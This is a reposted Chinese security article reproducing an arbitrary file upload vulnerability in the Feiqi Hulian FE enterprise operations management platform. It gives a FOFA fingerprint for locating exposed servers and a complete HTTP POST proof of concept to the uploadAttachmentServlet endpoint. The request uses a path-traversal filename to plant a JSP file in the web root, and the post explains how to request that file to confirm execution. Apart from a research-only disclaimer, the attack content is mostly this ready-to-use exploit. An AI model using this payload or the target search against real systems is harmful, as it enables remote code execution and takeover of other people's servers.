飞企互联-FE企业运营管理平台接口存在任意文件上传

admin 2024年5月17日19:43:11评论56 views字数 898阅读2分59秒阅读模式

漏洞描述

飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型,该系统接口存在任意文件上传,攻击者通过上传特制的文件,可以执行服务器上的任意代码,从而获得服务器的进一步控制权。

飞企互联-FE企业运营管理平台接口存在任意文件上传

资产确定

fofa:

 body="/login/indexPicXml_valid.jsp?p="

漏洞复现

1.利用如下POC进行文件上传

POST /servlet/uploadAttachmentServlet HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 363Content-Type: multipart/form-data; boundary=036c66929801f7197782d8915b8fd5f0--036c66929801f7197782d8915b8fd5f0Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/588437.jsp"Content-Type: text/plain<% out.println("297425389");%>--036c66929801f7197782d8915b8fd5f0Content-Disposition: form-data; name="json"{"iq":{"query":{"UpdateType":"mail"}}}--036c66929801f7197782d8915b8fd5f0--

飞企互联-FE企业运营管理平台接口存在任意文件上传

1.解析 http://{{Hostname}}/588437.jsp;,记得在最后加";"

飞企互联-FE企业运营管理平台接口存在任意文件上传

如有侵权,请联系删除

 

原文始发于微信公众号(我爱林):漏洞复现 || 飞企互联-FE企业运营管理平台接口存在任意文件上传

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日19:43:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   飞企互联-FE企业运营管理平台接口存在任意文件上传https://cn-sec.com/archives/2744155.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息